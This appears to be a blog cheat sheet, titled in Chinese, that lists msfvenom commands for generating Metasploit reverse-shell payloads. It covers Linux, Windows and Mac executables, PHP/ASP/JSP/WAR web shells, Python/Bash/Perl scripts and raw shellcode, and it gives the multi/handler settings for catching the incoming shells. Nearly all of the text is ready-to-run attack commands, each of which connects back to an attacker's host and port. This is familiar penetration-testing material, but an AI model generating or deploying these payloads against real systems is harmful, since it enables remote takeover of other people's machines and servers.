• msf下的各种生成payload命令


    msf下的各种生成payload命令

    List payloads

    msfvenom -l

    Binaries:

    Linux

    msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf

    Windows

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe

    Mac

    msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho
    
    Web Payloads

    PHP

    msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
    
    cat shell.php | pbcopy && echo '<?php ' | tr -d '
    ' > shell.php && pbpaste >> shell.php

    ASP

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp

    JSP

    msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp

    WAR

    msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war
    
    Scripting Payloads

    Python

    msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py

    Bash

    msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh

    Perl

    msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl

    Shellcode:

    For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.

    Linux Based Shellcode

    msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

    Windows Based Shellcode

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

    Mac Based Shellcode

    msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

    Handlers

    Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format.

    use exploit/multi/handler
    
    set PAYLOAD <Payload name>
    
    set LHOST <LHOST value>
    
    set LPORT <LPORT value>
    
    set ExitOnSession false
    
    exploit -j -z
  • 相关阅读:
    [网站运营]浅谈如何尽可能的避免cms网站被黑
    [CDN]阿里云(企业云解析DNS)让你的博客飞起来
    阿里新生的面试经,与老人分享的职业进阶攻略及规划
    高逼格!程序猿的表白也可以这么浪漫
    程序员表白专属技能,你还不快学起来
    序列上的一些文章
    序列上的一些文章
    最长不下降子序列
    最长不下降子序列
    luoguP2831 愤怒的小鸟
  • 原文地址:https://www.cnblogs.com/liang-chen/p/11734121.html
Copyright © 2020-2023  润新知